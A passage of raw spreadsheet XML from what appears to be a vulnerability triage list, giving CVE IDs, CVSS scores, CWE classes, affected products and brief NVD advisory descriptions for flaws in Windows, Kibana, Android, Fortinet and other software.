s="5" t="n"><v>8.1</v></c><c r="E675" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F675" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G675" s="5" t="inlineStr" /><c r="H675" s="5" t="n"><v>0.006</v></c><c r="I675" s="5" t="inlineStr" /><c r="J675" s="5" t="inlineStr" /><c r="K675" s="5" t="inlineStr" /><c r="L675" s="5" t="inlineStr" /><c r="M675" s="5" t="inlineStr" /><c r="N675" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O675" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P675" s="5" t="inlineStr" /><c r="Q675" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R675" s="5" t="inlineStr"><is><t>Use after free in Windows SMB Client allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S675" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72936</t></is></c></row><row r="676"><c r="A676" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B676" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C676" s="5" t="inlineStr"><is><t>CVE-2026-72981</t></is></c><c r="D676" s="5" t="n"><v>8.1</v></c><c r="E676" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F676" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G676" s="5" t="inlineStr" /><c r="H676" s="5" t="n"><v>0.005</v></c><c r="I676" s="5" t="inlineStr" /><c r="J676" s="5" t="inlineStr" /><c r="K676" s="5" t="inlineStr" /><c r="L676" s="5" t="inlineStr" /><c r="M676" s="5" t="inlineStr" /><c r="N676" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O676" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P676" s="5" t="inlineStr" /><c r="Q676" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R676" s="5" t="inlineStr"><is><t>Use after free in IP Helper allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S676" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72981</t></is></c></row><row r="677"><c r="A677" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B677" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C677" s="5" t="inlineStr"><is><t>CVE-2026-72987</t></is></c><c r="D677" s="5" t="n"><v>8.1</v></c><c r="E677" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F677" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G677" s="5" t="inlineStr" /><c r="H677" s="5" t="n"><v>0.006</v></c><c r="I677" s="5" t="inlineStr" /><c r="J677" s="5" t="inlineStr" /><c r="K677" s="5" t="inlineStr" /><c r="L677" s="5" t="inlineStr" /><c r="M677" s="5" t="inlineStr" /><c r="N677" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O677" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P677" s="5" t="inlineStr" /><c r="Q677" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R677" s="5" t="inlineStr"><is><t>Use after free in Windows DNS allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S677" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72987</t></is></c></row><row r="678"><c r="A678" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B678" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C678" s="5" t="inlineStr"><is><t>CVE-2026-73313</t></is></c><c r="D678" s="5" t="n"><v>8.1</v></c><c r="E678" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F678" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G678" s="5" t="inlineStr" /><c r="H678" s="5" t="n"><v>0.004</v></c><c r="I678" s="5" t="inlineStr" /><c r="J678" s="5" t="inlineStr" /><c r="K678" s="5" t="inlineStr"><is><t>xenforo:xenforo</t></is></c><c r="L678" s="5" t="inlineStr" /><c r="M678" s="5" t="inlineStr" /><c r="N678" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O678" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P678" s="5" t="inlineStr" /><c r="Q678" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="R678" s="5" t="inlineStr"><is><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is></c><c r="S678" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73313</t></is></c></row><row r="679"><c r="A679" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B679" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C679" s="5" t="inlineStr"><is><t>CVE-2026-75021</t></is></c><c r="D679" s="5" t="n"><v>8.1</v></c><c r="E679" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F679" s="5" t="inlineStr"><is><t>ce714d77-add3-4f53-aff5-83d477b104bb</t></is></c><c r="G679" s="5" t="inlineStr" /><c r="H679" s="5" t="n"><v>0.004</v></c><c r="I679" s="5" t="inlineStr" /><c r="J679" s="5" t="inlineStr" /><c r="K679" s="5" t="inlineStr" /><c r="L679" s="5" t="inlineStr" /><c r="M679" s="5" t="inlineStr" /><c r="N679" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O679" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P679" s="5" t="inlineStr" /><c r="Q679" s="5" t="inlineStr"><is><t>CWE-1327</t></is></c><c r="R679" s="5" t="inlineStr"><is><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is></c><c r="S679" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75021</t></is></c></row><row r="680"><c r="A680" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B680" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C680" s="5" t="inlineStr"><is><t>CVE-2026-77505</t></is></c><c r="D680" s="5" t="n"><v>8.1</v></c><c r="E680" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F680" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G680" s="5" t="inlineStr" /><c r="H680" s="5" t="n"><v>0.005</v></c><c r="I680" s="5" t="inlineStr" /><c r="J680" s="5" t="inlineStr" /><c r="K680" s="5" t="inlineStr" /><c r="L680" s="5" t="inlineStr" /><c r="M680" s="5" t="inlineStr" /><c r="N680" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O680" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P680" s="5" t="inlineStr" /><c r="Q680" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R680" s="5" t="inlineStr"><is><t>Use after free in DNS Server allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S680" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77505</t></is></c></row><row r="681"><c r="A681" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B681" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C681" s="5" t="inlineStr"><is><t>CVE-2026-78444</t></is></c><c r="D681" s="5" t="n"><v>8.1</v></c><c r="E681" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F681" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G681" s="5" t="inlineStr" /><c r="H681" s="5" t="n"><v>0.005</v></c><c r="I681" s="5" t="inlineStr" /><c r="J681" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K681" s="5" t="inlineStr"><is><t>microsoft:windows_10_1809, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L681" s="5" t="inlineStr" /><c r="M681" s="5" t="inlineStr" /><c r="N681" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O681" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P681" s="5" t="inlineStr" /><c r="Q681" s="5" t="inlineStr"><is><t>CWE-822</t></is></c><c r="R681" s="5" t="inlineStr"><is><t>Untrusted pointer dereference in Windows Failover Cluster allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S681" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78444</t></is></c></row><row r="682"><c r="A682" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B682" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C682" s="5" t="inlineStr"><is><t>CVE-2026-78449</t></is></c><c r="D682" s="5" t="n"><v>8.1</v></c><c r="E682" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F682" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G682" s="5" t="inlineStr" /><c r="H682" s="5" t="n"><v>0.005</v></c><c r="I682" s="5" t="inlineStr" /><c r="J682" s="5" t="inlineStr" /><c r="K682" s="5" t="inlineStr" /><c r="L682" s="5" t="inlineStr" /><c r="M682" s="5" t="inlineStr" /><c r="N682" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O682" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P682" s="5" t="inlineStr" /><c r="Q682" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R682" s="5" t="inlineStr"><is><t>Use after free in Reliable Multicast Transport Driver (RMCAST) allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S682" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78449</t></is></c></row><row r="683"><c r="A683" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B683" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C683" s="5" t="inlineStr"><is><t>CVE-2026-78450</t></is></c><c r="D683" s="5" t="n"><v>8.1</v></c><c r="E683" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F683" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G683" s="5" t="inlineStr" /><c r="H683" s="5" t="n"><v>0.005</v></c><c r="I683" s="5" t="inlineStr" /><c r="J683" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K683" s="5" t="inlineStr"><is><t>microsoft:windows_10_1809, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L683" s="5" t="inlineStr" /><c r="M683" s="5" t="inlineStr" /><c r="N683" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O683" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P683" s="5" t="inlineStr" /><c r="Q683" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R683" s="5" t="inlineStr"><is><t>Use after free in Reliable Multicast Transport Driver (RMCAST) allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S683" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78450</t></is></c></row><row r="684"><c r="A684" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B684" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C684" s="5" t="inlineStr"><is><t>CVE-2026-78583</t></is></c><c r="D684" s="5" t="n"><v>8.1</v></c><c r="E684" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F684" s="5" t="inlineStr"><is><t>security@elastic.co</t></is></c><c r="G684" s="5" t="inlineStr" /><c r="H684" s="5" t="n"><v>0.002</v></c><c r="I684" s="5" t="inlineStr" /><c r="J684" s="5" t="inlineStr"><is><t>elastic</t></is></c><c r="K684" s="5" t="inlineStr"><is><t>elastic:kibana</t></is></c><c r="L684" s="5" t="inlineStr" /><c r="M684" s="5" t="inlineStr" /><c r="N684" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O684" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P684" s="5" t="inlineStr" /><c r="Q684" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="R684" s="5" t="inlineStr"><is><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is></c><c r="S684" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78583</t></is></c></row><row r="685"><c r="A685" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B685" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C685" s="5" t="inlineStr"><is><t>CVE-2026-78626</t></is></c><c r="D685" s="5" t="n"><v>8.1</v></c><c r="E685" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F685" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G685" s="5" t="inlineStr" /><c r="H685" s="5" t="n"><v>0.002</v></c><c r="I685" s="5" t="inlineStr" /><c r="J685" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K685" s="5" t="inlineStr" /><c r="L685" s="5" t="inlineStr" /><c r="M685" s="5" t="inlineStr" /><c r="N685" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O685" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P685" s="5" t="inlineStr" /><c r="Q685" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="R685" s="5" t="inlineStr"><is><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is></c><c r="S685" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78626</t></is></c></row><row r="686"><c r="A686" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B686" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C686" s="5" t="inlineStr"><is><t>CVE-2026-79746</t></is></c><c r="D686" s="5" t="n"><v>8.1</v></c><c r="E686" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F686" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G686" s="5" t="inlineStr" /><c r="H686" s="5" t="n"><v>0.003</v></c><c r="I686" s="5" t="inlineStr" /><c r="J686" s="5" t="inlineStr" /><c r="K686" s="5" t="inlineStr" /><c r="L686" s="5" t="inlineStr" /><c r="M686" s="5" t="inlineStr" /><c r="N686" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O686" s="5" t="inlineStr"><is><t>2026-08-31</t></is></c><c r="P686" s="5" t="inlineStr" /><c r="Q686" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="R686" s="5" t="inlineStr"><is><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is></c><c r="S686" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79746</t></is></c></row><row r="687"><c r="A687" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B687" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C687" s="5" t="inlineStr"><is><t>CVE-2026-82066</t></is></c><c r="D687" s="5" t="n"><v>8.1</v></c><c r="E687" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F687" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G687" s="5" t="inlineStr" /><c r="H687" s="5" t="n"><v>0.002</v></c><c r="I687" s="5" t="inlineStr" /><c r="J687" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K687" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L687" s="5" t="inlineStr" /><c r="M687" s="5" t="inlineStr" /><c r="N687" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O687" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P687" s="5" t="inlineStr" /><c r="Q687" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R687" s="5" t="inlineStr"><is><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is></c><c r="S687" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82066</t></is></c></row><row r="688"><c r="A688" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B688" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C688" s="5" t="inlineStr"><is><t>CVE-2026-82302</t></is></c><c r="D688" s="5" t="n"><v>8.1</v></c><c r="E688" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F688" s="5" t="inlineStr"><is><t>security@elastic.co</t></is></c><c r="G688" s="5" t="inlineStr" /><c r="H688" s="5" t="n"><v>0.002</v></c><c r="I688" s="5" t="inlineStr" /><c r="J688" s="5" t="inlineStr" /><c r="K688" s="5" t="inlineStr" /><c r="L688" s="5" t="inlineStr" /><c r="M688" s="5" t="inlineStr" /><c r="N688" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O688" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P688" s="5" t="inlineStr" /><c r="Q688" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="R688" s="5" t="inlineStr"><is><t>Incorrect Authorization (CWE-863) in Kibana can lead to unauthorized configuration modification via Exploiting Incorrectly Configured Access Control Security Levels (CAPEC-180).</t></is></c><c r="S688" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82302</t></is></c></row><row r="689"><c r="A689" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B689" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C689" s="5" t="inlineStr"><is><t>CVE-2026-83527</t></is></c><c r="D689" s="5" t="n"><v>8.1</v></c><c r="E689" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F689" s="5" t="inlineStr"><is><t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t></is></c><c r="G689" s="5" t="inlineStr" /><c r="H689" s="5" t="n"><v>0.015</v></c><c r="I689" s="5" t="inlineStr" /><c r="J689" s="5" t="inlineStr" /><c r="K689" s="5" t="inlineStr" /><c r="L689" s="5" t="inlineStr" /><c r="M689" s="5" t="inlineStr" /><c r="N689" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O689" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P689" s="5" t="inlineStr" /><c r="Q689" s="5" t="inlineStr"><is><t>CWE-288</t></is></c><c r="R689" s="5" t="inlineStr"><is><t>An Authentication Bypass vulnerability in Sentry before R10.8.2, R10.7.3 and R10.6.4 allows a remote unauthenticated attacker to gain administrative level access.</t></is></c><c r="S689" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83527</t></is></c></row><row r="690"><c r="A690" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B690" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C690" s="5" t="inlineStr"><is><t>CVE-2026-83997</t></is></c><c r="D690" s="5" t="n"><v>8.1</v></c><c r="E690" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F690" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G690" s="5" t="inlineStr" /><c r="H690" s="5" t="n"><v>0.005</v></c><c r="I690" s="5" t="inlineStr" /><c r="J690" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K690" s="5" t="inlineStr"><is><t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L690" s="5" t="inlineStr" /><c r="M690" s="5" t="inlineStr" /><c r="N690" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O690" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P690" s="5" t="inlineStr" /><c r="Q690" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R690" s="5" t="inlineStr"><is><t>Use after free in Windows Message Queuing allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S690" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83997</t></is></c></row><row r="691"><c r="A691" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B691" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C691" s="5" t="inlineStr"><is><t>CVE-2026-84393</t></is></c><c r="D691" s="5" t="n"><v>8.1</v></c><c r="E691" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F691" s="5" t="inlineStr"><is><t>psirt@fortinet.com</t></is></c><c r="G691" s="5" t="inlineStr" /><c r="H691" s="5" t="n"><v>0.002</v></c><c r="I691" s="5" t="inlineStr" /><c r="J691" s="5" t="inlineStr"><is><t>fortinet</t></is></c><c r="K691" s="5" t="inlineStr" /><c r="L691" s="5" t="inlineStr" /><c r="M691" s="5" t="inlineStr" /><c r="N691" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O691" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P691" s="5" t="inlineStr" /><c r="Q691" s="5" t="inlineStr"><is><t>CWE-297</t></is></c><c r="R691" s="5" t="inlineStr"><is><t>A improper validation of certificate with host mismatch vulnerability in Fortinet FortiOS 7.6.1 through 7.6.6, FortiProxy 7.6.2 through 7.6.6 may allow attacker to information disclosure via &lt;insert attack vector here&gt;</t></is></c><c r="S691" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84393</t></is></c></row><row r="692"><c r="A692" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B692" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C692" s="5" t="inlineStr"><is><t>CVE-2026-85160</t></is></c><c r="D692" s="5" t="n"><v>8.1</v></c><c r="E692" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F692" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G692" s="5" t="inlineStr" /><c r="H692" s="5" t="n"><v>0.002</v></c><c r="I692" s="5" t="inlineStr" /><c r="J692" s="5" t="inlineStr" /><c r="K692" s="5" t="inlineStr" /><c r="L692" s="5" t="inlineStr" /><c r="M692" s="5" t="inlineStr" /><c r="N692" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O692" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P692" s="5" t="inlineStr" /><c r="Q692" s="5" t="inlineStr"><is><t>CWE-73</t></is></c><c r="R692" s="5" t="inlineStr"><is><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is></c><c r="S692" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85160</t></is></c></row><row r="693"><c r="A693" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B693" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C693" s="5" t="inlineStr"><is><t>CVE-2026-86720</t></is></c><c r="D693" s="5" t="n"><v>8.1</v></c><c r="E693" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F693" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G693" s="5" t="inlineStr" /><c r="H693" s="5" t="n"><v>0.003</v></c><c r="I693" s="5" t="inlineStr" /><c r="J693" s="5" t="inlineStr" /><c r="K693" s="5" t="inlineStr" /><c r="L693" s="5" t="inlineStr" /><c r="M693" s="5" t="inlineStr" /><c r="N693" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O693" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P693" s="5" t="inlineStr" /><c r="Q693" s="5" t="inlineStr"><is><t>CWE-639</t></is></c><c r="R693" s="5" t="inlineStr"><is><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is></c><c r="S693" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86720</t></is></c></row><row r="694"><c r="A694" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B694" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C694" s="5" t="inlineStr"><is><t>CVE-2026-86723</t></is></c><c r="D694" s="5" t="n"><v>8.1</v></c><c r="E694" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F694" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G694" s="5" t="inlineStr" /><c r="H694" s="5" t="n"><v>0.003</v></c><c r="I694" s="5" t="inlineStr" /><c r="J694" s="5" t="inlineStr" /><c r="K694" s="5" t="inlineStr" /><c r="L694" s="5" t="inlineStr" /><c r="M694" s="5" t="inlineStr" /><c r="N694" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O694" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P694" s="5" t="inlineStr" /><c r="Q694" s="5" t="inlineStr"><is><t>CWE-287</t></is></c><c r="R694" s="5" t="inlineStr"><is><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is></c><c r="S694" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86723</t></is></c></row><row r="695"><c r="A695" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B695" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C695" s="5" t="inlineStr"><is><t>CVE-2026-28662</t></is></c><c r="D695" s="5" t="n"><v>8</v></c><c r="E695" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F695" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G695" s="5" t="inlineStr" /><c r="H695" s="5" t="n"><v>0.001</v></c><c r="I695" s="5" t="inlineStr" /><c r="J695" s="5" t="inlineStr" /><c r="K695" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L695" s="5" t="inlineStr" /><c r="M695" s="5" t="inlineStr" /><c r="N695" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O695" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P695" s="5" t="inlineStr" /><c r="Q695" s="5" t="inlineStr"><is><t>CWE-122, CWE-787</t></is></c><c r="R695" s="5" t="inlineStr"><is><t>In p2p_process_prov_disc_bootstrap_req of p2p_pd.c, there is a possible out of bounds write due to a heap buffer overflow. This could lead to remote (proximal/adjacent) code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="S695" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28662</t></is></c></row><row r="696"><c r="A696" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B696" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C696" s="5" t="inlineStr"><is><t>CVE-2026-55277</t></is></c><c r="D696" s="5" t="n"><v>8</v></c><c r="E696" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F696" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G696" s="5" t="inlineStr" /><c r="H696" s="5" t="n"><v>0.001</v></c><c r="I696" s="5" t="inlineStr" /><c r="J696" s="5" t="inlineStr" /><c r="K696" s="5" t="inlineStr" /><c r="L696" s="5" t="inlineStr" /><c r="M696" s="5" t="inlineStr" /><c r="N696" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O696" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P696" s="5" t="inlineStr" /><c r="Q696" s="5" t="inlineStr"><is><t>CWE-120</t></is></c><c r="R696" s="5" t="inlineStr"><is><t>In checkUiccListenConfigNeeded of RoutingManager.cpp, there is a possible out of bounds write due to a missing bounds check. This could lead to remote (proximal/adjacent) code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="S696" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-55277</t></is></c></row><row r="697"><c r="A697" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B697" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C697" s="5" t="inlineStr"><is><t>CVE-2026-68827</t></is></c><c r="D697" s="5" t="n"><v>8</v></c><c r="E697" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F697" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G697" s="5" t="inlineStr" /><c r="H697" s="5" t="n"><v>0.004</v></c><c r="I697" s="5" t="inlineStr" /><c r="J697" s="5" t="inlineStr" /><c r="K697" s="5" t="inlineStr" /><c r="L697" s="5" t="inlineStr" /><c r="M697" s="5" t="inlineStr" /><c r="N697" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O697" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P697" s="5" t="inlineStr" /><c r="Q697" s="5" t="inlineStr"><is><t>CWE-122, CWE-191</t></is></c><c r="R697" s="5" t="inlineStr"><is><t>Integer underflow (wrap or wraparound) in Windows GDI+ allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S697" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68827</t></is></c></row><row r="698"><c r="A698" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B698" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C698" s="5" t="inlineStr"><is><t>CVE-2026-68834</t></is></c><c r="D698" s="5" t="n"><v>8</v></c><c r="E698" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F698" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G698" s="5" t="inlineStr" /><c r="H698" s="5" t="n"><v>0.006</v></c><c r="I698" s="5" t="inlineStr" /><c r="J698" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K69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8" s="5" t="inlineStr" /><c r="M698" s="5" t="inlineStr" /><c r="N698" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O698" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P698" s="5" t="inlineStr" /><c r="Q698" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="R698" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows NTFS allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S698" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68834</t></is></c></row><row r="699"><c r="A699" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B699" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C699" s="5" t="inlineStr"><is><t>CVE-2026-68838</t></is></c><c r="D699" s="5" t="n"><v>8</v></c><c r="E699" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F699" s="5" 